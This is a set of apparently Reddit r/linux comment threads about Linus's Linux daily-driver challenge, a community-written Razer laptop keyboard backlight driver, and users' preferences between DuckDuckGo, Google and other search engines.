Linus seemed legitimately stupid in this series. I know most users here are putting on their best face like they’re ambassadors of Linux, but he seemed to lack basic computer literacy and problem solving skills and you know it. Luke did fine. Why should we all give a shit if some random Linux distro is made to mimick windows closely enough that nobody ever gets confused? Why is that good?
Fast boot can still be enabled you just have to reboot windows instead of shutting it down.
What do you guys use to sign PDFs?
i love Linus driver challenge which shows typical problems that newbie face...i have face same thing at the start and from that experience always recommend people still have ago but need free time.
Can we link to each video as part of the "part" headers?
"Cave Story+ looks weird."

Is probably caused by the second screen
> Complains that the "show desktop" button doesn't work exactly like Windows

> Complains that mouse acceleration works exactly like Windows

¿????

And this is why I don't consider this weird Linus person a valid use case for things that are "wrong" with Linux. Most of the stuff they mention is just stuff that is different from Windows. If people want Windows, why are they insisting that Linux becomes it?
I really wish there was a "Windows Daily Driver Challenge" video series by Linux users, could be entertaining.
Let's stop and first ask if these are legit problems that need solving or if it's just a squeaky wheel.
Issue #1:

> Compress file - Done. Wish progress bar was more detailed (Nautilus). Its just a circle getting filled up.'

Just click the circle and you'll see the progress and compression/transfer speed.

> Please turn on "Create link" option in Nautilus by default. Or provide creating shortcut by drag+ctrl+shift.

Alt+drag -> Link Here
Thanks a lot for doing this! Very good initiative.
This is frankly embarrassing. This is the biggest list of layer 8 issues I've ever seen in my life.
is it just me or is Linus looking at it too much from a "well this is what i'd have to do on Windows" perspective? also "best distro for gaming" guy needs to grow up.
Feel free to disagree but I think the problem is that Linux distros/community doesn't seem to agree on standards and things get very, very all over the place.

And sometimes I get the feeling that there is a certain aversion to standards that manifests in weird ways.

I mean, just the sheer amount of distros available (fragmentation) imo is a problem. 


FYI, I ran Arch for months and didn't run into issues when it was all setup properly and I knew my ways but there were things that needed improvement ofc.
Hate to be buzz kill but I dont see the point here. There are thousands if not tens of thousands of these bugs in linux distros. You fix 0.1%, it wont amount to anything. Just look at all those "it works for me" "you should know better" attitude from devs. And they have the right to do it, they are after all doing it for free. And it brings to my point that a good product for average user has to be commercial. Since very few people care about other people's experience when he is not compensated for his work.
Linus just showed us how unfit he is at anything other than consuming. Techtips my ass.
Linus: *Github is to complicated for normal users.*

Linux community: *Let's help! Here's a github page. Pull requests welcome*

Sometimes you don't know what is real and what is satire anymore.
[deleted]
The thing that everyone who is upset is forgetting is that no one in the Linux community owes anything to Linus or even an explanation.

Thing is that he’s near the top end of someone you would call computer savvy and if doing something in your UI isn’t intuitive to him, is it truly a good design?  Maybe it is, but is asking yourself the question front a different perspective a bad thing?

I mean, we’ve all been waiting for the Linux desktop to take over since the mid 00’s and still have single digits (or close) share.  Maybe this is fine, or maybe not ideal for whatever you’re using Linux for.  The question is, would it be a bad thing of there was a Linux distro that softened these edges and brought more people in?  That way they could gradually learn how to be Linux power users while having an intuitive GUI crutch when they “just want to get xyz done.”
Well,
you are free to fix that stuff and build a distribution which caters to linus wims. 

but please, leave the rest of us alone. most of the issues are either not really issues, or HARD to solve because it needs willingness of hardware vendors.
All of these are either non-issues, misunderstandings, or other flawed "issues".  His whole channel is just a massive clickbait where he bumbles through every single thing he tries and acts like he knows what he's doing.  His entire channel and point of view is best ignored for the clickbait, attention-grabbing mess that it is.
I really don't get why the Pop installer had such high sensitivity. My highschool  once set the sensitivity high, they were forced so change it in a few hours after 100s of students complained the first day of school lol.
TLDR; Razer uses some odd proprietary way to control keyboard brightness via software that only works under Linux. My project I've been working on for a while finally allows for easy configurable keyboard brightness control

&#x200B;

This has been a 3 month journey to get to this point. Razer uses a very strange way of controlling the keyboard backlight on their keyboards, such that even Windows does not recognize it like it does for thinkpad keyboards, no keyboard backlight control without synapse under windows. 

So I'm pretty happy that I finally worked on this, but essentially managed to expose a sysfs file in /sys/class/leds/ that now allows for KDE and Gnome to see the keyboard backlight as a 'normal' keyboard backlight, and can control the keyboard backlight natively depending on what i set in power management for AC or battery power.

&#x200B;

Demo video of this working with KDE:  
[https://youtu.be/9HrKqD5xZVU](https://youtu.be/9HrKqD5xZVU)

Project link (the testing code is in the procfs\_test branch):  
[https://github.com/rnd-ash/razer-laptop-control](https://github.com/rnd-ash/razer-laptop-control)

&#x200B;

Feedback is welcome from any devs here (I reckon my codebase is seriously messy and needs work).

&#x200B;

I do eventually hope to mainline this some day!
> (I reckon my codebase is seriously messy and needs work)

The best software is the software you write.
I don't have a razer laptop but thanks for your contribution :)
Does this project have any ties to openrazer? if you want to mainline I would commit there.
Nice work, Synapse feels like malware. On Windows, I refused to install it and I had so much trouble gritting it to stop pestering me to install.
Very nice, any plans to have this upstreamed in the linux kernel?
great work :)
could this be upstreamed to openRgb maybe?
thanks for this, mate. Fingers crossed you can get it into the linux kernel at some point
Very cool.

I would still recommend against anyone buying a razer laptop if you plan on running linux (or windows). Their firmware is utter crap and you'll be hard pressed to get an decent support.
I think you messed up the first sentence of your post. Is Razer's keyboard brightness control software really proprietary linux- only software?
Holy dude you are awesome, even though I don't have razer laptop XD
This is amazing, thank you so much for your work!! It'd be great to see something like this for the MSI laptops with " Steel Series mystic light" and Dragon Center nonsense.
This is cool as shit, OP. I'd recommend collaborating with the OpenRGB/OpenRazer person/people and getting your collective code to more people, putting more devs on this whole series of projects.

Now all the Razer products are missing is Coreboot, though that would make it a little challenging to use the dedicated graphics.
I use OpenRazer with Polychromatic and it all runs fine for me. Or maybe I'm misunderstanding this.
[deleted]
The whole RGB lights being proprietary in laptops and motherboards just pisses me off so much. Having to install some software that runs all the time and is probably sending some data back to them.. well it just makes me want to give them a sandwich with wet bread.
This is huge. I can’t tell you how long I tired to find something compatible with my razer stealth, then I had a Linux distro on it. Days... Literal days of trying to find something that would work.
Would be cool to have some sort of control for my Ducky Shine 7
how did you do that? I always find this interesting, how ppl write drivers for something they have no documentation for.

Did you do something like "sniffing" of the communication like you would to reverse a network protocol?
This seriously awesome! I don't have a Razer laptop myself, but I imagine other people here might. So really thank you for your work! :D
I have a razer blade stealth, I find projects like this very encouraging! I love razer products and also love linux so to see support like this from the community is great, thank you for your work!
Awesome, thanks for your contribution! How is GPU support these days? Back in 2017 I had trouble getting the Nvidia Optimus (or whatever it’s called) to work on my Razer Blade 2017. To switch graphics, I had to reboot the computer.
This is fantastic! Great work!
Hi, could you please point out how did you do this, I mean what did you read? Maybe you could recommed something? Or should I just try to dig in your code?

I own an aero 15 v8 laptop and run arch (Manjaro btw) on it and I still have to load windows to change keyboard colors. Plus it would be great to learn something new about Linux.
Thanks for your work !
Is it possible to do this with other addressable lighting? For example RGB PC components?
So it's just some usb protocol in the end? I get the impression that the support likely should be done entirely in userspace for Razer devices. It's a bit weird to read and write to files in sysfs that in the end just constructs some usb protocol packets, when you could be sending those same usb protocol packets straight away from userspace without touching the kernel at all. Then again, I don't know if that kind of thing is commonplace in kernel, and what kind of abstractions (is there a "libkeyboard-backlight.so") are used to handle this kind of stuff in general. If not, there probably should be. Just banging files in /sys is a little bit too raw an interface for something like this. If there is, then sending a path to library that handles keyboard backlight stuff for Razer devices would be great.
I'm reading this thread and it seems people are using linux on Razor laptops. I recently was gifted a Razer Blade 2019 Base and I can't get any Distro to work properly.  Here are the problems... Sleep/wake when the lid is closed doesn't work.  Battery is terrible.  Maybe an 1 1/2. When I plug in the power cord, the laptop shuts down.  I've tried almost every major distro.  I've had more success with Arch than Debian.  Has anyone else had these problems and if so, how did you fix them?
The project is pretty awesome. I have no doubt it's much better than Razer's proprietary software. Always nice to see new hardware support for Linux. Do you plan to contribute it to the upstream kernel?

I see the driver communicates with the laptop's embedded controller. How did you reverse engineer this interface? I have a similar project for my Clevo laptop and I reverse engineered the keyboard LEDs feature but fan control seems to go through the EC. Nothing shows up when I capture USB traffic so it must be going through ACPI. I can't find a way to intercept it.
Anything new on the Tuxwdo InfinityBooks?

Been hoping for this for 10 Months :/
Have you heard of OpenRazer?
I've observed that most of the advance user prefer DuckDuckGo as it doesn't apply any machine learning to learn from your search history and that mean it's great for doing research and general use.
Its great for programming, stackoverflow answers are put in duck duck go answers.
Yes, I know how to type search queries, and I find Google's tendency to second guess my query infuriating: 
Did you mean thing-I-didn't-type? No.
Here are some results that exclude a search term. Not useful.
I have included a few terms you didn't write. Thanks, but no thanks.

DDG is not as good a search engine, but at least it searches for exactly what I query. For technical queries this is essential. Also, the bang-searches are gold. !py pickle does indeed return Python's documentation, instead of old veggies. I always use !g for natural language queries, though.
I use DuckDuckGo but fairly often add the !g bang to my search when I didn't get satisfactory results on the first go.
!aur !wiki !wolframalpha !crates !docsrs !cpp yes!
I have ddg as my default search basically everywhere, for most searches the results are of comparable quality. The exclamation mark shortcuts are a blessing - I used to have search keywords for things like wikipedia and google, but they weren't synced with Firefox sync so I had to set them up separately for each machine I used. !wikt someword or !osm someplace are incredibly convenient.
[deleted]
Theoretically speaking I don't think one can trust DDG more than Google in case of protecting our privacy (i.e. just because they don't use our search results to show personalized ads doesn't mean that they're not misusing our data). That being said, I use DDG as my default search engine because they are spreading a message about how a company's privacy policy should be!
I use DDG, Qwant and Start.

In a purely search context I've not used Google in years.
I like duckduckgo.  
because it can search with another country more easily than google.
I am useing ecosia to search for things. 
DuckDuckGo has the best layout for the results when using w3m which is my primary browser.

It's pretty annoying though that their search syntax is really fucking limited. The [syntax](https://duck.co/help/results/syntax) their help lists doesn't actually work and things like `-site:foo.bar` has the exact opposite effect it should have. But unfortunately same applies to pretty much all search engines, it seems to be some kind of trend to remove all useful functionality that might confuse a grandma.

And holy shit, why does no search engine allow you to search literal strings by quoting them anymore?

There are no good search engines anymore.
deleted  ^^^^^^^^^^^^^^^^0.0906  [^^^What ^^^is ^^^this?](https://pastebin.com/FcrFs94k/97718)
I currently use Startpage, does all I want fine. I got to wonder about DDG's privacy, I don't think you can really trust any service.
Google lost me when they removed the ability to filter searches by forum posts. DDG has filled the gap admirably since then and is now my default everywhere except in parlance; to google is now an inescapable verb. If I tell someone to search the internet for something so as not to waste my time I will tell them to google it. 
I do. Google tries too hard to manipulate my search. I use google maybe 10 times in a year. And when I use it I do it in duckduckgo.
The less Google services I use the happier I am
yes, duckduckgo is my default.

You can use Startpage.com as well. It will show you Google search results without the Google cookies, tracking and advertising.  
startpage.com
Yes. And I'm saving a lot of time since having switched from Google.com to DuckDuckGo.com since I get better results quicker now with DuckDuckGo
I started using it to not have to feed Google more, got used to it and don't want to go back now. The results are always what I need, it respects my privacy and has a dark mode. 
I use ddg and startpage over Google primarily for privacy reasons. Anything I can do to have Google collect less data is good. 
I prefer Startpage.com over DuckDuckGo. Did you try that Startpage?
I feel like 95% of the time Google is best. 
Yes, because I don’t like being tracked in opaque ways.

Regarding the quality of search results, I haven't noticed a problem, but I'm also realizing that search engines just don't make as much sense as they used to. It's not Web 2.0 anymore. Information is more and more concentrated on a few relevant websites, and there's less and less reason to search the whole internet - less and less reason for search engines to exist. If you're searching for tech support, your best results will be from Stack Overflow. If you're searching for definitions of things, Wikipedia/Wiktionary. DuckDuckGo's bang searches are great for this, but in my personal habits they end up being probably the majority of my searches, so I'm hardly even using the search engine itself. 
Yes, I'm a daily user of DDG but I must confess some !g
Yes, but I also use !g for a a lot of "hard" search queries that ddg doesn't seem to be able to handle.
I do all my work searches from a private browsing tab, seems to keep the machines from learning how little I know about MySQL queries.
No ... google has much better results for me.  I like the *idea* of DuckDuckGo.   For me the results are enough worse that I don't even use it anymore.  Specifically, the results on technical subjects seems to be worse -- i.e. if I'm looking for a specific math paper, etc.
I am using it as my main search engine, their bangs are really useful to make it painless. For example if I need something from google I would just prefix my query with !g
I use duckduckgo because I don't want to be overly reliant on google. If it doesn't give me a good result, Ill try google next. Usually if I am stuck, the google results aren't that much better, and I have to go directly to [google scholar](https://scholar.google.com) which is more targeted. 
I use DDG, despite being irritated by lack of google maps. Now that I see you can use !m for maps, !g for google, !d for dictionary and !w for wikipedia, I'm all set and never going back.
Yes, and I am happy with results.
Not yet. Their results are not quite as relevant for me as a developer. I hope they improve with more machine learning experimentation.
Yes, better return of searches with duckduckgo and they don't use censorship like Google. 
Yes! I mostly use it because of the "bangs," which let you go to sites like Wikipedia, stackoverflow, eBay, etc. with only one or two extra keystrokes.
No, because DuckDuckGo **use the Yandex and Yahoo** sources. It's just a wrapper, not independent service and use funny slogan for better marketing. 
I prefer start page. Duckduckgo's results are quite incomplete
I have stopped using Big-G and just using DDG the last years, and I have survived so. I think i stick to DDG because I don't like Big-G sell my personal information. The information which i like keeping myself.
So I donate to DDG and will not change back to Big-G EVER
Yea.
yes. Bang syntax is amazing yt! m! tr! a!
youtube, map, amazon, translate...

Yes. Use bangs all the time. Often have to use !g though.
i do use duckduckgo as my default search engine, but it happens from time to time when i have to google for specific error messages that i fall back to google and get slightly better results, or more exaclty what i am looking for rather
Used DDG for years
No. I switched back to google after they stopped showing results publish date.
I recently started using Duck Duck Go after a long hiatus and I find it generally gets me what I want straight away now, so I'll be using it as my main search engine from now on. I've set it as default search engine in Firefox and on the Albert launcher I use.
It works great as a search engine. The only thing I miss is Google's news tab is much better, but I probably shouldn't rely on Google to give me the news anyway.
Yes. 
I use duckduckgo but sometimes I need Google if I want to find something super vague
No.  But part of it is probably I use Google so much they have a lot of other data to help in my searches.

It would be really hard at this point for another search engine to be able to compete.

Plus the longer I use Google the harder it will be.
I love it! However, I still use Google for local searches and encrypted.google.com in extreme cases when DDG refuses to show me more results.
Yes, but I have to use the bang g at least several times a day. 

If DDG results were as good as google's I'd never look back.
I use [Qwant](https://www.qwant.com) a lot, since it has its own index.

DuckDuckGo is ok, but I can't help but sometimes I have to resort to Google.
I recently began using DDG and while I occasionally try giggle as an alternative I don't usually find its results any better than DDG when I do.

Thanks all for the bang searches tip! :-)
I tried it, but about a quarter of the time DDG couldn't find what I was looking for, so I'd need to Google it anyway.
It's pretty irritating when it autocompletes a search which you've never searched before but have just been talking to someone about in the same room.
Yes.

I think DuckDuckGo results are better overall, Google used to be the best when it comes to search engines, but since they introduced natural language searchs, it went downhill. Everytime I search for something technical on Google, it ignores my terms and give me something completely unrelated.
I switched to DDG a year or so ago, and like it just fine. I've used Google a handful of times when DDG didn't return helpful results, but in most of those cases Google wasn't much better anyway. I may have to scroll a little more on DDG sometimes, but I don't have a problem with that. It's a small price to pay for better privacy. 
yes I avoid google/amazon/apple/microsoft as much as I can possible can... unfortunatelly not everything has good options but duckduckgo is one of the good options
Only when I am looking for sem-weird stuff that's not quite illegal but also not something I'd like any public body to associate with me.
Ive been a ddg user for three years now, the bangs really do it for me. Google Search has gotten entirely too bloated - I just just want search results and not much else.
DDG is my default, although sometimes it's lacking, especially in the image search department. I use google when I can't find what I'm looking for, or about 10% of the time
I use DuckDuck as default just to keep an alternative to Google alive but when I'm looking for something specific and can't get an answer I go to Google.  Ad blasting aside Google has the best search algorithms.
Yes, I prefer DuckDuckGo for searching.
Dude it's way better for me. I've never had a search that I couldn't find on ddg. And the goodies are amazing. Regex, git or Linux cheatsheets. And type in: QR code some-link.com
Startpage.com is better, get better privacy and get googles results. 
I use DuckDuckGo because it respects my privacy and doesn't collect data on my searches. Very rarely, if DuckDuckGo results are not enough, I use Google.
The feature I keep coming back to with Google is show results in past 24h/month/year. Especially when searching on Linux topics that could have high-ranking results ranging from 2011-2018.

If this were an option on the search results page for DDG, I'd use it more often.


For programming, DuckDuckGo is miles better.

For anything else... if only i searched anything else :'(

No but seriously, the results I want are often buried in google. 
Indeed -- been using it for several years now...
NO, i prefer google over duckduckgo.
But sometimes, i use duckdukgo.
after reading these comment, i should have to change my default to DDG, thanks.

I use DuckDuckGo as my primary search engine for over a year now, and I have never looked back.
Pfft, even if it had tracking.

Being able to use it with keyboard really well, no results separated in nonsensical pages and the fact that I can say to someone "search x and click 3rd link you got" trumps Google completely

Not even mentioning that results I get with duckduckgo are always more relevant, no adds in between and no bazillion duplicates of same page as Google does it
DuckDuckGo is really good. I can't go back from using bangs.
yeah, I do
Actually I blocked majority of google service
Now I use Gmail, Youtube and Hangouts only from google service
I prefer duckduckgo b/c google is too fucking big, i don't want everything I do tracked, recorded, and sold.   That's why people use it.  Has nothing to do with being "advanced".  I also have no idea why this is posted on /r/linux 
[deleted]
I do not. Google gets the results I need more often. I don't have time to care about anything else.
It doesn't track me. I love it.
[deleted]
Both. But for different things. Or sometimes at the same time. 

Sometimes I have to search outside of the profile bubble and for that I use ddg especially. 
I tried it for a while, but their image search overview is a bit more cluttered than Google's and even though Google takes a lot of results down under DMCA it still finds more stuff.
It's really good, also it looks great meanwhile google try to look ugly on Firefox Android. I had never a page not found on ddg. More than that, I use Firefox and not Chrome because you can't enable the ddg search on it xD.
So yes i prefer DDG over Big-G
I prefer qwant.com to DDG.
I use Qwant, better than DuckDuckGo in my opinion (UI, results, philosophy...)
Yep..
It sometimes gives unexpected results though.. like when you have safe search off searching for **man page resize** and hits the image tab..  I kinda got results I was NOT looking for.  
  
DDG has vim bindings h,j,k,l btw..  +1  :)   love it.
The problem is, people are so accustomed to Google they find the results are the best they could have. We have been formed by Windows+Google.
Hell yes, though if I get crappy results I occasionally put in !g at the end...
DDG has everything except the one feature I'd love - locally stored lists of results I'd like to blacklist (the old "show me everything except expertsexhange and the daily mail" feature)
meh i use searchX
Yes. Absolutely. I haven't used gsearch for a year and it's been awesome. Aside from liking the duck duck go results more, I also like the privacy aspect. 
Yes especially if I went get rid of my Interest based ads!
DDG
I prefer it in some ways, I just wish they'd curate the searches better.





For example if I type a product name, the top result should be the official specifications from the manufacturer's website, then everything else second. 
Yes... and I Like the bang shortcuts too.... and whenever we use the !g bang, at least DDG also still gets our queries, which may help them improve their algorithm
Absolutely. The searches on DDG are more consistent and more useful. It's so good I have fewer bookmarks now as I can query DDG for things I use frequently and always find them. 
I migrated all my environments (work and private) about a year ago over to DDG as the default search engine. For all those technical searches (sysadmin and programming stuff) its a nice fit (instant answers). And if I'm really unable find anything useful I use the `!g` prefix. Also dark design FTW.
It is my default search engine but transition was a bit rough. Google has profiled me well so my searches were always on topic for the most part. These days I prefer DDG's answers and simplicity without trying to second-guess my queries.
I switched a while back, and I like it overall. I tend to use search engines 1990's/2000's style, where you give it target keywords or a query, instead of typing full english phrases and sentences. DDG seems to behave fine with that style of querying.

They initially [crowd-sourced](https://duckduckhack.com/) a lot of their "instant answers" plugins, but it seems they have suspended that program while they figure out something more manageable.
it's been very useful to answer programming question. However, when I need to calculate some numbers, DDG has some problems (ie, "18TiB / 12mbit/s" or "12$/TiB * 0.23MB" is something google will happily calculate while DDG doesn't get an answer (google even correctly converts kbit/kbyte/kibibyte) so there is room for improvement)
I use Google primarily, I prefer there stuff. But I'm happy to use ddg or Bing if it comes up
With the bang search capabilities of ddg there is literally no reason to default to Google 
I want to use DuckDuckGo but its search results do not show any date. It's really important for me to know how old the contents are.
I use DDG and don't feel compelled to change. I dont think it is "better" in terms of knowing what I'm looking for but most of the time they both perform perfectly well and DDG has some things where it does better. I like to give Google as little of my search history as I can without spending much time or effort thinking about it. 

I would estimate that somewhere around 5 to 10% of the time I end up searching again on Google and then of those times, Google gets me what I'm looking for about 25% of the time. Otherwise it's just a tough query, what I want doesn't exist, I'm not using the right terms, etc. 

I'm also addicted to the bangs now.
DDG for personal, both for technical things.
I don't get very good results with DuckDuckGo. It's not very good, at least in my experience.
Yep. On every device.
DuckDuckGo is bad for finding Arch Linux official packages, for example, if you search for "arch neovim", only AUR packages show up and you'll have to use bangs. I wish giving them feedback wouldn't just be forwarded to /dev/null.
google probably has better results, but i can still get what i'm looking for w/ duckduckgo w/o too much extra effort, and i like their privacy policy and how easily the interface can be modified (i love dark interfaces!).
One thing I miss from both is the ability to restrict my search just to forums/discussions. Google had this available for a while but they dropped it. And DDG haven't even bothered.
The !bangs, various hidden tools, customization, and privacy all make it great. Also, back in the day Google would honor literal string searches and operators, now it seems to ignore them but DuckDuckGo still uses then which is helpful.
DuckDuckGo has been set as my default search engine in FireFox for a little over two years (since they were added by Mozilla).

Pros: obviously privacy, web search results are plenty good enough, fast, lightweight (easy on bandwidth), answers from Wikipedia, Yelp, etc are helpful

Cons: image search doesn't seem to be on par with Google, Amazon product search is annoyingly sponsored, but I understand the need for funding (I love Google Product Search for comparing prices)

Edited: formatting
no.
Ddg needs better temporal filters. Otherwise, it's pretty decent.
Yes.
Yes. 

Bangs for searching are a huge efficiency improvement for me.
I use DDG all the time. Bang syntax for searching youtube, amazon, and wikipedia is a time saver and I'll use !g for google if I don't find what I want.
I tended to use !g all the time and then stopped using it.
DDG is "Google Plus" (not the social thing Google has... as in more than just Google) imo. I use it for everything and if I happen to need a query that requires Google... I add `!g` to the beginning of the query. Bam, I'm on Google.

The bangs sold me on DDG, honestly. I can directly search websites easily.
I use Duckduckgo and Bing and Google
I used to have ddg as my default engine, but I lost count of how much I had to use !g to get more relevant searches .  
This caused me  to switch to encrypted.google.com with search history disabled .
The major appeal is that _it doesn't track you_. This is the original reason why your results aren't personalized based on your search history. It was meant to replace Google since people are becoming more and more concerned about the widespread use of Google services.
I decided to switch to ddg for my work search engine, and haven't  really noticed anything lacking. It does pretty much the same job as Google. I keep Google as my default at home because I'm so far invested in the ecosystem.
Ddg for life
I used to think that Google = biggest = most pages indexed = most efficient.

But after reading a HN post about Google "memory losses" I started realizing that it is not as efficient as it used to be for some types of queries...Have other people noticed this ?

I occasionally use DuckDuckGo because it actually gives better results than Google sometimes.
I rather use ddg, give it a shot 2 o 3 times and if I don't find what I want i just add !g at the beginning. 
It is my default, and I generally like not being bubbled.

Though sometimes the bubble is helpful, and `g! [my search]` will pull up google for those moments.

It also has a lot of cool things for developers *eg* search for `regex cheatsheet` or `ascii table` in duckduckgo.
DuckDuckGo is my homepage, so yes I do prefer it.
Late to the party and this will get buried way down, but the only internet (meta)search engine so far that I actually *adored* was [Seeks](https://en.wikipedia.org/wiki/Seeks), it was (still is, if someone revives the project):

- FOSS (and self-hosted)
- P2P, based on DHT
- re-ranked results based on your own actions and peers with a similar behaviour (i.e. you could mark a link as relevant or irrelevant)
- and what I loved the most was that the way you searched was a lot more logical (needed some getting used to though), two of the options I used daily:
  - you could narrow or expand how literally your query should be taken
  - you could group by clusters – e.g. searching for “jaguar” would then produce results grouped under clusters “car”, “animal”, “video games”, etc.
  - you could group by e.g. articles, blogs, microblogs/social media
- if you wanted, it had a social aspect – it not just showed what others were searching that were searching for a similar thing as you, but (so I heard, I never seen it in person) if two persons were looking for a similar query at the same time, it would offer them to chat about it.

Their grand idea and the reason why they were a meta-search engine without its own spiders was that instead of crawling the web for content, in the future web servers would be announcing new content, so search engines etc. would already get the relevant meta data.

I looooooved Seeks, and to be honest, would pay money for it to be further developed and maintained.

As for the OP’s original question, on my personal machines, I do usually default to DDG these days, but my work computer defaults (for now) to Google. I also tried Searx, Qwant and IxQuick/StartPage, and sometimes switch to those, but don’t have a strong favourite among these.

I miss Seeks…
I have a question that I hope someone more informed won't mind answering. I do my best to maintain privacy but, at the same time, Google ends up with access to basically all of my data (Android, Gmail, etc.). I do my best to use third party services for specific things (Dropbox instead of Drive) but mostly because I find that they perform better since that's their entire business model. 

Are there any instances of real privacy concerns with Google? Cooperation with the Gov or selling identifying data that couldn't be easily obtained elsewhere? I mainly use FF but that means I'm inherently trusting Mozilla instead of Google (I'm pretty sure FF isn't open source but I haven't checked GitHub for the codebase). Any comments on any of this?

EDIT: Paragraph for clarity.
I prefer DDG for a few functional reasons one being the color picker. It is just that much better. It also does a better job with code related queries. It also has a really nice preview interface for stack exchange, though I usually visit the full on site anyways.
No. For the simple reason that Google provides me with much better results overall. And, I'm able to find the things I need quicker. 

However, I do (of course) like DuckDuckGo's data privacy better, for sure, along with some other features such as the bangs.

I usually try to use DuckDuckGo about each two weeks for half a day. But every time I use it, I feel like I'm less efficient, even though I think DuckDuckGo is more _comfortable_. I'm not too concerned about data privacy, therefore I switch back to Google every time.
I understand how Google makes money. Would someone please explain how DDG does? Thanks very much.
I don't know how this is related to Linux, but yes, I use DDG.
No. I try to use DDG for a few days every year or so, because I want to like it, but the search results never seem to be what I'm looking for. From other's comments, it sounds like I need to learn the syntax for a better experience?
I use DDG as my default search engine.  It has some pluses, literally.  Unlike Google, you can use the "+" operator with DDG to get it to only return results with that term.  (Google used to do that, but they took away that feature a few years ago.  They still accept the operator, but ignore it.)

What I don't like is that DDG doesn't do as well sorting by time.  For example, searching on Red Hat's site, DDG will just a likely, if not more likely, return results for RHEL4 and RHEL5 instead of later RHEL releases.  Google will almost always put RHEL 7 pages first in sorting.

Also as mentioned, DDG just doesn't have as many pages in its search db.  If looking for some obscure topic, Google is almost always better.

Either way though, like many others, I never use Google directly, but use DDG with !g.
I tried it for a few months, but constantly found myself having to revert to Google to actually find what I was looking for. DDG often gave me completely useless or even unrelated content. 

I was disappointed because a few friends of mine kept talking about how great DDG was. Not very good if I have to use another search engine to find stuff. 

People are all "But tracking!" and "muh privacy" but that very same tracking algorithm is what helps Google give you exactly what you are looking for in the first couple of links. 

I chose usability and results over privacy. Oh well. 
It is my default search engine so I use duck duck go almost all of the time.  I use !gm a lot though because I prefer to use google maps over open street maps.
yes - but i heard DDG just scrapes google. Might try another soon. 

Been using Brave browser and it’s been great
Yes.  With DDG I sometimes have to be more explicit, because Google's search essentially assumes as context my entire past search history.  And while that means google can be "easier" as long as I'm doing the same thing, if I'm not, or if I explicitly *want* to venture outside my search bubble, it's impossible.

So I really like DDG, and it didn't take long at all to get used to an extra term or two in my searches to provide context.
I use searx (open source meta search engine) to search with multiple search engines including google and ddg.
I like that it checks crontabs for you: https://duckduckgo.com/?q=crontab+*+*+*+*+15&t=h_&ia=qa
I do it simply bc I distrust Google. I've made a conscious effort to cut them out of my life completely and this is a big part of it. (ProtonMail for gmail, self hosted Nextcloud on a rpi for drive, lineageOS in my android phone).

Regarding privacy I don't think Microsoft is any better than Google nowadays
How do they make any money?
Whonix user here, so DDG for me. However, Im curious what other search engines might be worth a try.. Are we limiteds to only two 'decent' choices?
Try DDG first. If results are puny star down the list. Google maps in top three but not Google.
Duckduckgo and if I need to !g
DuckDuckGo is grreat. Among other things, I love the bang commands: 

* `!dfw alloy` to look up alloys in the Dwarf Fortress wiki. 
* `!meme cosmic brain` to double-check that I'm making the cosmic brain meme the right way.
* `!memegen expanding brain` to make one. Except then the captions aren't right.
* `!i expanding brain` to find a decent example already up that you can use in Gimp.

[And then you upload one.](https://imgur.com/a/tZJaP)

Edit: Yes, people still use Aol. I work tier 2 home network support for a major ISP, and a week or two back I was shocked as fuck to hear "You've got mail!" after I asked the customer to test that her internet was working. 
DDG and SP have been my defaults for about four years, and as many others have said I'll probably only use a !g or !sp once in a while. Tbh I much prefer the UI for DDG vs SP. Only unsatisfactory thing I find with DDG is image search, so I'll use !images a couple of times a week but that's about it.

Love DDG for troubleshooting code or even MS Office issues if I'm at work, even its wiki summaries are good imo. Absolutely love the bangs. 

On phone I usually use Disconnect search into DDG engine via FF Focus browser, if I have my VPN switched on mainstream search engines give me all sorts of grief. Worse via TOR though. :/
I've been using DDG for years and haven't looked back.  The only Google search I use is Google images.  Once in a blue moon if I search for something on DDG and feel like the results are not to my liking I'll double-check with Google but it's always given me the same search result in those situations.
I use DDG for proper multilingual / multinational support.

Google is localized by the display language, current nation (google.com.tw or google.co.jp), and more factors that I have no idea about; switching region is an absolute nightmare. In DDG, it's a toggle with a dropdown to select the current region.

This is particularly relevant for me, as I search in both Japanese and Mandarin, two languages which share a lot of characters. A quick region switch speeds things up for me a lot.
Yes because when i search for a specific site google puts a paid ad for that site and the link doesn't work so i just use the second link which is the thing i was looking for.
DDG
No but **StartPage**!

Also [http://lmsptfy.com/let me startpage that for you](https://lmsptfy.com/?q=Let%20me%20startpage%20that%20for%20you)
For programmers, DuckDuckGo is a good option. It gives good links for the searches posted. I use it for my programming related queries.
I use mostly Duck duck go. I like to get results for what I'm searching for and not results based on what I or someone else likes to see.
Yes, Im a big fan of them in general. I feel like they give better answers then even google...
I tried to switch a few times but the big issue I always had was accuracy of searches was really far off a lot. They really need to work on their crawler and their search logic more than anything. At the moment I would say I'd only switch once they improve the accuracy otherwise it's in the same category as Ask to me. 
Yes
I prefer Google as it has the option to search for pages made in the past year — Useful for technical stuff so as not to get outdated info.
Yes definitely, haven't used any google services in years.
I find that google over emphasizes trending things. If I search for something and one or two of the words in my search correspond to something that is currently popular then my search results will be dominated by that topic.

I find this a bit odd really. If it's something that's currently popular then there is a good chance I don't need a search engine to find out more about it.

What I like about ddg is that I can put search terms in quotes to make them required. Google used to let you do this but, as far as I can tell, it's no longer supported.

Basically, ddg does less screwing around with my search terms and gives me things that are more directly related to my search terms than google does.

These days if I'm trying to find something obscure, I usually try three or four searches in ddg, then add the "g!" to redirect the search to google. Realize the google results are worse than what ddg was giving me and go back to ddg.
I find that Google machine learning focuses in on actual relevant links vs duckduckgo returning what everyone else thinks is relevant.

I always assume this is because I don't search for many things, personally, that I wouldn't also search for during work.

Edit: Maybe I am just lucky, maybe I need more of a personal life.
No. Google creepily watches my every move and knows what I'm looking for before I ask for it. That is convenient.
In terms of the search accuracy most of the times Google is the best option. But reason of why I use Duckduckgo isn't it. Altough it is quite enough for most searches. 
Startpage and Duckduck Go with Google in 3rd. place. 
Been using DDG for a long time now.  Only thing I find myself going on Google for is images, I find their image search is better. 
I like it quite a bit, however I have Firefox configured so that if I get into a tough question, I can !g in the URL bar and have it search Google instead. Google often has really good results but I like DuckDuckGo quite a bit. 
I prefer DuckDuckGo over Google search because, Google defaults to Swedish here in Sweden even if I set it to English explicitly.

Also DuckDuckGo has snippets for code searches.
DDG FTW !
DuckDuckGo, not being spied on is a great feature, not to mention Google has been known to be manipulative and alter search results/censor.
I’ve started to use DDG as my search gateway since sometimes it’s accurate enough for what I’m looking for and if it’s not I use the bangs feature to go to start page. All of this for privacy reasons. 
100%, I absolutely love duckduckgo. At first it took some getting use to, but once I did I never looked back.
